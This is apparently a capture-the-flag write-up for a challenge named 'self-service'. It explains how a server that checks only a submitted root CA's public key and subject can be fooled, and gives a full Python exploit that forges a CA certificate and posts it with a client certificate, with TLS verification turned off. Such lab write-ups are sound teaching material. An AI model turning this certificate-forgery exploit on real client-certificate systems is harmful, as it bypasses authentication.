self-service
SRC: https://library.m0unt41n.ch/challenges/self-serviceThe challenge relies on client certificate authentication using a custom root CA (ca.pem) which recently expired. The server blindly trusts any submitted root certificate as long as the public key and subject match the expected CA, without verifying the self-signature. We exploited this by forging a new root certificate with the same public key and subject, but a fresh validity period, signed using our own key. Submitting this fake CA alongside the original client.pem bypasses validation and reveals the flag.
Here my xploit, the authority file etc. is downloadable from the chall service:
Python:
from OpenSSL import crypto
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
OLD_CA = crypto.load_certificate(crypto.FILETYPE_PEM, open("ca.pem", "rb").read())
OLD_PUB = OLD_CA.get_pubkey()
sign_key = crypto.PKey()
sign_key.generate_key(crypto.TYPE_RSA, 4096)
new_ca = crypto.X509()
new_ca.set_version(2)
subj = new_ca.get_subject()
subj.C = "CH"
subj.ST = "Zurich"
subj.L = "Zurich"
subj.O = "SelfService Company Ltd"
subj.OU = "SelfService IT Department"
subj.CN = "SelfService Legacy Root CA"
new_ca.set_serial_number(9876)
new_ca.gmtime_adj_notBefore(0)
new_ca.gmtime_adj_notAfter(365*24*60*60)
new_ca.set_issuer(subj)
new_ca.set_pubkey(OLD_PUB)
new_ca.add_extensions([
crypto.X509Extension(b"basicConstraints", True, b"CA:TRUE,pathlen:0"),
crypto.X509Extension(b"keyUsage", True, b"keyCertSign,cRLSign"),
])
new_ca.sign(sign_key, "sha512")
with open("forged_ca.pem", "wb") as f:
f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, new_ca))
url = "https://x.library.m0unt41n.ch:31337/cert"
files = {
"ca": open("forged_ca.pem", "rb"),
"client": open("client.pem", "rb")
}
response = requests.post(url, files=files, verify=False)
print(response.text)